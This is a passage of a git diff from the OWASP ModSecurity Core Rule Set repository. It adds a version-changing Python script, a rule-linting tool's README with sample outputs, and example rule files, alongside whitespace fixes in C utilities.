continue; if (strlen(name) < MAX_NAME_LENGTH) - strcpy(parameters[num_of_params].name,name); + strcpy(parameters[num_of_params].name,name); else continue; if (strlen(value) < MAX_VALUE_LENGTH) { - strcpy(parameters[num_of_params].value,value); + strcpy(parameters[num_of_params].value,value); num_of_params++; } } @@ -426,7 +426,7 @@ int send_request(char *request,char *ip,char *port,char *reply,int max_reply_siz i = 1; reply_len=0; while ( (reply_len < max_reply_size) && (i>0) ) { - i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); + i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); if (i > 0 ) reply_len+=i; } reply[reply_len] = '\0'; @@ -602,7 +602,7 @@ int init_cgi() setresuid(0,0,0); setresgid(0,0,0); - + strcpy(modsec_cli_home,"/opt/modsecurity-cli"); strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); diff --git a/util/av-scanning/runAV/runAV-clamd.c b/util/av-scanning/runAV/runAV-clamd.c index 83319fdcab..c3526ad819 100755 --- a/util/av-scanning/runAV/runAV-clamd.c +++ b/util/av-scanning/runAV/runAV-clamd.c @@ -15,7 +15,7 @@ main(int argc, char *argv[]) if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { - printf ("1 exec empty: OK"); + printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); @@ -40,7 +40,7 @@ main(int argc, char *argv[]) else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } - else { + else { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } } diff --git a/util/av-scanning/runAV/runAV.c b/util/av-scanning/runAV/runAV.c index 1bbf763073..7d74d2e1b5 100755 --- a/util/av-scanning/runAV/runAV.c +++ b/util/av-scanning/runAV/runAV.c @@ -15,7 +15,7 @@ main(int argc, char *argv[]) if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { - printf ("1 exec empty: OK"); + printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); @@ -40,7 +40,7 @@ main(int argc, char *argv[]) else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } - else { + else { printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); } } diff --git a/util/change-version/README.md b/util/change-version/README.md new file mode 100644 index 0000000000..7867d3111a --- /dev/null +++ b/util/change-version/README.md @@ -0,0 +1,113 @@ +# Change version in CRS + +This page describes how can you change the version strings in CRS rules. + +## Goals + +The problem is change the version string in CRS rules isn't trivial. Version string used for mark all rule by the `ver` action, mark the whole file in a comment, or mark the rule set with `SecComponentSignature`. Few examples: + +* in a rule: `SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass"` +* comment: `# OWASP ModSecurity Core Rule Set ver.3.3.0` +* config directive: `SecComponentSignature "OWASP_CRS/3.3.0"` + +There are many other pattern which look-a-like version string, but that isn't it. + +The main task is replace only the real version strings by the new one. + +The Python script below helps to do that on the whole rule set or any unique file. + +## Prerequisites + +* Python3 interpreter +* [msc_pyparser](https://github.com/digitalwave/msc_pyparser) +* CRS rule set + +You can install the `msc_pyparser` through PIP - that's the recommended method, see the [instructions](https://github.com/digitalwave/msc_pyparser#installing-using-pip3). + +If you already have this package, don't forget to update it before you start the work: + +```bash +python3 -m pip install --upgrade msc_pyparser +``` + +## Usage + +The script expects three mandatory and one optional arguments: + +* input file or directory +* output **directory** +* version string for `ver` actions and `SecComponentSignature` - these are always the same +* and optionally, the version string for comments + +Please note that the input can be a single file (eg. 'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is always a **directory** where the script puts the transformed file or files. + +### Run the script + +Consider you want to change only the `ver` and `SecComponentSignature` values by a new one, eg: `OWASP_CRS/3.4.0-dev`. The current value is `OWASP_CRS/3.3.0`. The next command will solve this: + +```bash +mkdir /path/to/coreruleset/rules_new +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +The new files will placed under the `/path/to/coreruleset/rules_new`, now make a diff: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the comments have been left untouched. + +In the next example, we can replace them too: + +```bash +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +Run the diff again: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +2c2 +< # OWASP ModSecurity Core Rule Set ver.3.3.0 +--- +> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the version string at the end of comment line has changed in line 2. diff --git a/util/change-version/README.txt b/util/change-version/README.txt new file mode 100644 index 0000000000..984a91c576 --- /dev/null +++ b/util/change-version/README.txt @@ -0,0 +1,117 @@ +Change version in CRS +===================== + +This page describes how can you change the version strings in CRS rules. + + +Goals +----- +The problem is change the version string in CRS rules isn't trivial. Version +string used for mark all rule by the ver action, mark the whole file in a +comment, or mark the rule set with SecComponentSignature. Few examples: + + * in a rule: SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass" + * comment: # OWASP ModSecurity Core Rule Set ver.3.3.0 + * config directive: SecComponentSignature "OWASP_CRS/3.3.0" + +There are many other pattern which look-a-like version string, but that +isn't it. + +The main task is replace only the real version strings by the new one. + +The Python script below helps to do that on the whole rule set or any unique +file. + +Prerequisites +------------- + * Python3 interpreter + * msc_pyparser + * CRS rule set + +You can install the msc_pyparser through PIP - that's the recommended method, +see the instructions. + +If you already have this package, don't forget to update it before you start +the work: + +python3 -m pip install --upgrade msc_pyparser + + +Usage +----- +The script expects three mandatory and one optional arguments: + +* input file or directory +* output directory +* version string for ver actions and SecComponentSignature - these are always + the same and optionally, the version string for comments + +Please note that the input can be a single file (eg. +'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta +name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is +always a directory where the script puts the transformed file or files. + +Run the script +-------------- +Consider you want to change only the ver and SecComponentSignature values by a +new one, eg: OWASP_CRS/3.4.0-dev. The current value is OWASP_CRS/3.3.0. The +next command will solve this: + +mkdir /path/to/coreruleset/rules_new +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf + +The new files will placed under the /path/to/coreruleset/rules_new, now make a diff: + +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... + +As you can see, the comments have been left untouched. + +In the next example, we can replace them too: + +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf + +Run the diff again: + +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +2c2 +< # OWASP ModSecurity Core Rule Set ver.3.3.0 +--- +> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... + +As you can see, the version string at the end of comment line has changed in line 2. diff --git a/util/change-version/change-version.py b/util/change-version/change-version.py new file mode 100755 index 0000000000..6e39a8e716 --- /dev/null +++ b/util/change-version/change-version.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python3 + +import sys +import glob +import msc_pyparser +import os.path +import re + +class FileTransform(object): + def __init__(self, data): + self.data = data + self.cverpatt = "ver\.\d+\.\d+\.\d+$" + self.re_cverpatt = re.compile(self.cverpatt) + + def change_version(self, version, cversion): + # iterate through AST items + # self.data: the parsed structure + for d in self.data: + # id the item has 'actions' then we can check the 'ver' key + if "actions" in d: + aidx = 0 + while aidx < len(d['actions']): + a = d['actions'][aidx] + # if we found one, replace the value + if a['act_name'] == "ver": + a['act_arg'] = version + aidx += 1 + else: + # replace SecComponentSignature by same version string + if d['type'].lower() == "seccomponentsignature": + d['arguments'][0]['argument'] = version + + # replace the versions in comments if cversion exists + if cversion is not None: + if d['type'].lower() == "comment" and self.re_cverpatt.search(d['argument']): + d['argument'] = re.sub(self.cverpatt, "ver.%s" % (cversion), d['argument']) + +class FileHandler(object): + def __init__(self, **kwargs): + for key, value in kwargs.items(): + setattr(self, key, value) + if not hasattr(self, 'cversion'): + self.cversion = None + + self.output = self.output.rstrip("/") + "/" + + # iterate through the list of files + for f in glob.glob(self.input): + print(f"Working with file: %s" % (f)) + # read the file content + try: + with open(f) as file: + data = file.read() + except: + print("Exception caught - ", sys.exc_info()) + sys.exit(1) + + # build AST from content + try: + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + except: + print(sys.exc_info()[1]) + sys.exit(1) + + # change version and comment version if exists + try: + t = FileTransform(mparser.configlines) + t.change_version(self.version, self.cversion) + except: + print(sys.exc_info()[1]) + sys.exit(1) + + # save the new file + try: + mwriter = msc_pyparser.MSCWriter(mparser.configlines) + output = os.path.join(self.output, os.path.basename(f).lstrip("/")) + with open(output, "w") as file: + mwriter.generate() + # add extra new line at the end of file + mwriter.output.append("") + file.write("\n".join(mwriter.output)) + except: + print("Exception caught - ", sys.exc_info()) + sys.exit(1) + +if len(sys.argv) < 4: + print("Argument missing!") + print("Use: %s rule.conf /path/to/output/directory version" % sys.argv[0]) + print(" %s \"/path/to/rules/*.conf\" /path/to/output/directory version [comment_version]" % sys.argv[0]) + print("Example:") + print(" mkdir ../../rulestmp") + print(" %s \"../../rules/*.conf\" ../../rulestmp \"OWASP_CRS/3.4.0-dev\" \"3.4.0-dev\"" % sys.argv[0]) + sys.exit(1) + +args = { + 'input' : sys.argv[1], + 'output' : sys.argv[2], + 'version' : sys.argv[3] +} + +if len(sys.argv) > 4: + args['cversion'] = sys.argv[4] + +fh = FileHandler(**args) diff --git a/util/crs-rules-check/CHANGES b/util/crs-rules-check/CHANGES new file mode 100644 index 0000000000..109d221f12 --- /dev/null +++ b/util/crs-rules-check/CHANGES @@ -0,0 +1,3 @@ +v0.1 - 2021-12-02 +----------------- + * Initial release diff --git a/util/crs-rules-check/README.md b/util/crs-rules-check/README.md new file mode 100644 index 0000000000..8688f1b200 --- /dev/null +++ b/util/crs-rules-check/README.md @@ -0,0 +1,418 @@ +crs_rules_check +=============== + +Welcome to the `crs_rules_check` documentation. + +Prerequisites +============= + +To run the tool, you need: + ++ a **Python 3** interpreter ++ **msc_pyparser** - a SecRule parser (>=1.2.1) + +`msc_pyparser` was written in Python 3 and has not been tested with Python 2, therefore you have to use Python 3. + +The best way to install the required packages just run + +``` +pip3 install -r requirements.txt +``` + +How does it work +================ + +The script expects an argument at least - this would be a single file or a file list, eg: `/path/to/coreruleset/*.conf`. + +First, an attempt is made to parse each file specified on the command line. This is a "pre-check", and runs on all files before the other tests. + * **Parsing check** - try to parse the structure, this is a syntax check + **note**: this script is a bit more strict than mod_security. There are some cases, where mod_security allows the syntax, but [msc_pyparser](https://github.com/digitalwave/msc_pyparser/) not. + +Second, the script loops over each of the parsed structures. Each iteration consists of the following steps: + * **Casing check** - checks operators, actions, transformations and ctl names for proper casing + e.g., `@beginsWith` is allowed, `@beginswith` is not. In this step, the script also ensures that an operator is present, eg `SecRule ARGS "^.*"` isn't allowed without `@rx` operator. + * **Action order check** - This step verifies that actions are specified in the correct order - [see the wiki](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules) + * **Format check** CRS has a good reference for [indentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) and other formatting. `msc_pyparser` follows these rules when it creates the config file(s) from parsed structure(s). After the re-build is done, it runs a compare between the original file and the built one with help of `difflib`. The script reports all non-compliant formatting. + **Note**, that `difflib` is a part of the standard Python library, you don't need to install it. + * **Deprecation check** - This step checks for use of deprecated features. The following features are deprecated: + * `ctl:auditLogParts` [is no longer supported by CRS](https://github.com/coreruleset/coreruleset/pull/3090) + * **Duplicate ID's check** - This step checks that each rule has a unique ID. + * **paranoia-level/N tag and its value** - This step checks that the `paranoia-level/N` tag is present when required and whether it has the correct value `N` for its context. Specifically: + * if a rule is activated for a specific paranoia level `L` and does not have the `nolog` action, the `paranoia-level/N` tag **must** be set and the value of `N` **must** be `L` + * if a rule is activated outside of any paranoia level, or has the `nolog` action, the `paranoia-level/N` tag **must not** be set + * **Anomaly scoring check** - This step checks that rules are configured properly for the anomaly scoring mechanism: + * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}` + * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}` + * **Initialization of used transaction (TX) variables** - all used TX variables **must** be initialised before their first use. Using a TX variable means one of the following: + * the variable is a target of a rule, e.g., `SecRule TX.foo ...` + * the variable is an operator argument, eg `SecRule ARGS "@rx %{TX.foo}"...` + * the variable is a right hand side operand in a `setvar` action, eg `setvar:tx.bar=%{tx.foo}` + * the variable is in an expansion, e.g., as part of the value of a `msg` action: `msg:'Current value of variable: %{tx.foo}` +* **Check rule tags** - only tags listed in `util/APPROVED_TAGS` may be used as tags in rules + * to use a new tag on a rule, it **must** first be registered in the util/APPROVED_TAGS file + +Finally, the script prints a report of all unused TX variables. Usually, unused TX variables occur when a rule creates a TX variable (e.g., `setvar:tx.foo=1`) but the value of the variable is never used anywhere else. This will only be revealed after the script has checked all rules. + + +If script finds any parser error, it stops immediately. In case of other error, shows it (rule-by-rule). Finally, the script returns a non-zero value. + +If everything is fine, rule returns with 0. + +Normally, you should run the script: + +``` +./util/crs-rules-check/rules-check.py -r crs-setup.conf.example -r rules/*.conf +``` + +Optionally, you can add the option `--output=github` (default value is `native`): + +``` +./util/crs-rules-check/rules-check.py --output=github -r crs-setup.conf.example -r rules/*.conf +``` + +In this case, each line will have a prefix, which could be `::debug` or `::error`. See [this](https://docs.github.com/en/actions/using-workflows/workflow-commands-for-github-actions#setting-an-error-message). + +Examples +======== + +To run these samples, see the files in `examples` directory. + +### Test 1 - syntax check + +``` +SecRule &ARGS_GET "@eq 3" \ + "id:1,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + chain + SecRule ARGS_GET:foo "@rx bar" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.some_vars=1' +``` + +As you can see, there are two `"` missing above: the first one after the `chain`, and the other one from the end of the chained rule. Mod_security allows this, but this isn't well formed. (See [#2184](https://github.com/coreruleset/coreruleset/pull/2184)) + +Check it: + +``` +$ ./rules-check.py -r examples/test1.conf +Config file: examples/test1.conf +Can't parse config file: examples/test1.conf + file=examples/test1.conf, line=8, endLine=8, title=Parser error: can't parse file +$ echo $? +1 +``` + +### Test 2 - case sensitive test + +``` +SecRule REQUEST_URI "@beginswith /index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule the operator is lowercase. Mod_security allows both form. + +``` +$ ./rules-check.py -r examples/test2.conf +Config file: examples/test2.conf + Parsing ok. + Ignore case check found error(s) + file=examples/test2.conf, line=1, endLine=1, title=Case check: Operator case mismatch: @beginswith (rule: 1) + Action order check ok. + Indentation check ok. +$ echo $? +1 +``` + +### Test 3 - wrong action ordering + +``` +SecRule REQUEST_URI "@beginsWith /index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule, the `phase` and `id` are interchanged. As [documentation](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules) says, the first action **must** be the `id`, the second one is the `phase`. + +``` +$ ./rules-check.py -r examples/test3.conf +Config file: examples/test3.conf + Parsing ok. + Ignore case check ok. + Action order check found error(s) + file=examples/test3.conf, line=3, endLine=3, title=Action order check: action 'phase' at pos 0 is wrong place against 'id' at pos 1 (rule: 1) + Indentation check ok. +$ echo $? +1 +``` + +### Test 4 - wrong indentation + +``` + SecRule ARGS "@rx foo" \ + "id:1,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:2,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:3,\ + phase:1,\ + pass,\ + nolog" +``` + +In this rule set, the first line and the rule with `id:3` first action have an extra leading space. As [documentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) describes, CRS has a strict indentation rules. The script checks the indentation with help of Python's [difflib](https://docs.python.org/3.9/library/difflib.html). + +``` +$ ./rules-check.py -r examples/test4.conf +Config file: examples/test4.conf + Parsing ok. + Ignore case check ok. + Action order check ok. + Indentation check found error(s) +--- ++++ + file=examples/test4.conf, line=1, endLine=6, title=Indentation error: an indetation error has found +@@ -1,5 +1,5 @@ +- SecRule ARGS "@rx foo" \ +- "id:1,\ ++SecRule ARGS "@rx foo" \ ++ "id:1,\ + phase:1,\ + pass,\ + nolog" + file=examples/test4.conf, line=11, endLine=18, title=Indentation error: an indetation error has found +@@ -11,7 +11,7 @@ + nolog" + + SecRule ARGS "@rx foo" \ +- "id:3,\ ++ "id:3,\ + phase:1,\ + pass,\ + nolog" +``` + +### Test 5 - empty (implicit @rx) operator + +``` +SecRule REQUEST_URI "index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule, the operator is missing. As [ModSecurity documentation](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#rx) says "the rules that do not explicitly specify an operator default to @rx". In CRS, this isn't allowed. + +``` +$ ./rules-check.py -r examples/test5.conf +Config file: examples/test5.conf + Parsing ok. + Ignore case check found error(s) + file=examples/test5.conf, line=1, endLine=1, title=Case check: Empty operator isn't allowed (rule: 1) + Action order check ok. + Indentation check ok. +$ echo $? +1 +``` + +### Test 6 - check that rule does not contain 'ctl:auditLogParts' + +``` +SecRule TX:sql_error_match "@eq 1" \ + "id:1,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + ctl:auditLogParts=+E" +``` + +The `ctl:auditLogParts=+E` (or any kind of `ctl:auditLogParts`) is not allowed in CRS. + +See the CRS PR [#3034](https://github.com/coreruleset/coreruleset/pull/3034) + +``` +$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test6.conf +Config file: util/crs-rules-check/examples/test6.conf + Parsing ok. + Ignore case check ok. + Action order check ok. + Indentation check ok. + Found 'ctl:auditLogParts' action is in wrong place. + file=util/crs-rules-check/examples/test6.conf, line=7, endLine=7, title='ctl:auditLogParts' action in wrong place: action can only be placed in last part of a chained rule (rule: 1) +$ echo $? +1 +``` + +### Test 7 - check duplicate id's + +``` +SecRule ARGS "@rx foo" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" + +SecRule ARGS_NAMES "@rx bar" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" +``` + +In this rule file, there are two rules with same `id`. + +``` +$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test7.conf +Config file: util/crs-rules-check/examples/test7.conf + Parsing ok. +Checking parsed rules... +util/crs-rules-check/examples/test7.conf + Ignore case check ok. + Action order check ok. + Indentation check ok. + 'ctl:auditLogParts' actions are in right place. + Found duplicated id('s) + file=util/crs-rules-check/examples/test7.conf, line=10, endLine=10, title='id' is duplicated: id 1001 is duplicated, previous place: util/crs-rules-check/examples/test7.conf:3 + paranoia-level tags are correct. + PL anomaly_scores are correct. + All TX variables are set +End of checking parsed rules +$ echo $? +1 +``` + +### Test 8 - paranoia-level consitency check + +``` +SecRule &TX:blocking_paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.blocking_paranoia_level=1'" + +SecRule &TX:detection_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920160,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920161,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920162,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +``` + +In this rule file, there are more problems: +* rule 920160 is activated on PL1, but the `tag` value is PL2 +* at rule 920160, the TX variable gets error_anomaly_score, but the severity is CRITICAL +* at rule 920161 there is no severity action +* rule 920162 increments anomaly_score_pl2, but it's in PL1 + +``` +$ ./rules-check.py -r examples/test8.conf +Config file: examples/test8.conf + Parsing ok. +Checking parsed rules... +examples/test8.conf + Ignore case check ok. + Action order check ok. + Indentation check ok. + 'ctl:auditLogParts' actions are in right place. + no duplicate id's + Found incorrect paranoia-level/N tag(s) + file=examples/test8.conf, line=34, endLine=34, title=wrong or missing paranoia-level/N tag: tag 'paranoia-level/2' on PL 1, rule id: 920160 + Found incorrect (inbound|outbout)_anomaly_score value(s) + file=examples/test8.conf, line=36, endLine=36, title=wrong (inbound|outbout)_anomaly_score variable or value: invalid value for anomaly_score_pl1: tx.error_anomaly_score with severity critical, rule id: 920160 + file=examples/test8.conf, line=44, endLine=44, title=wrong (inbound|outbout)_anomaly_score variable or value: missing severity action, rule id: 920161 + file=examples/test8.conf, line=53, endLine=53, title=wrong (inbound|outbout)_anomaly_score variable or value: variable inbound_anomaly_score_pl2 on PL 1, rule id: 920162 + There are one or more unset TX variables. + file=examples/test8.conf, line=53, endLine=53, title=unset TX variable: TX variable 'critical_anomaly_score' not set / later set (rvar) in rule 920162 +End of checking parsed rules +Cumulated report about unused TX variables + No unused TX variable +$ echo $? +1 +``` + +### Test 9 - check state of used TX variables + + +``` +SecRule TX:foo "@rx bar" \ + "id:1001,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx ^.*$" \ + "id:1002,\ + phase:1,\ + pass,\ + nolog,\ + setvar:tx.bar=1" +``` + +In this rule file, there are more problems: +* rule 1001 used an uninitialized variable (`TX:foo`) +* rule 1002 sets a TX variable which never used diff --git a/util/crs-rules-check/TODO.txt b/util/crs-rules-check/TODO.txt new file mode 100644 index 0000000000..578a70d6ed --- /dev/null +++ b/util/crs-rules-check/TODO.txt @@ -0,0 +1,5 @@ + +* Add more checks + * check 'mandatory' actions, eg. `phase` + * check existing of necessary `tag`, eg. `OWASP_CRS/$$VER$$` + * check existing of `ver` action diff --git a/util/crs-rules-check/examples/test1.conf b/util/crs-rules-check/examples/test1.conf new file mode 100644 index 0000000000..3366b13a51 --- /dev/null +++ b/util/crs-rules-check/examples/test1.conf @@ -0,0 +1,10 @@ +SecRule &ARGS_GET "@eq 3" \ + "id:1,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + chain + SecRule ARGS_GET:foo "@rx bar" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.some_vars=1' diff --git a/util/crs-rules-check/examples/test2.conf b/util/crs-rules-check/examples/test2.conf new file mode 100644 index 0000000000..7b7d4eab97 --- /dev/null +++ b/util/crs-rules-check/examples/test2.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "@beginswith /index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" diff --git a/util/crs-rules-check/examples/test3.conf b/util/crs-rules-check/examples/test3.conf new file mode 100644 index 0000000000..2cd9d44e10 --- /dev/null +++ b/util/crs-rules-check/examples/test3.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "@beginsWith /index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" diff --git a/util/crs-rules-check/examples/test4.conf b/util/crs-rules-check/examples/test4.conf new file mode 100644 index 0000000000..00bc8374ab --- /dev/null +++ b/util/crs-rules-check/examples/test4.conf @@ -0,0 +1,17 @@ + SecRule ARGS "@rx foo" \ + "id:1,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:2,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:3,\ + phase:1,\ + pass,\ + nolog" diff --git a/util/crs-rules-check/examples/test5.conf b/util/crs-rules-check/examples/test5.conf new file mode 100644 index 0000000000..22638f3478 --- /dev/null +++ b/util/crs-rules-check/examples/test5.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" diff --git a/util/crs-rules-check/examples/test6.conf b/util/crs-rules-check/examples/test6.conf new file mode 100644 index 0000000000..63f6c9fec6 --- /dev/null +++ b/util/crs-rules-check/examples/test6.conf @@ -0,0 +1,7 @@ +SecRule ARGS "@rx attack" \ + "id:1,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + ctl:auditLogParts=+E" diff --git a/util/crs-rules-check/examples/test7.conf b/util/crs-rules-check/examples/test7.conf new file mode 100644 index 0000000000..405301364c --- /dev/null +++ b/util/crs-rules-check/examples/test7.conf @@ -0,0 +1,14 @@ + +SecRule ARGS "@rx foo" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" + +SecRule ARGS_NAMES "@rx bar" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" diff --git a/util/crs-rules-check/examples/test8.conf b/util/crs-rules-check/examples/test8.conf new file mode 100644 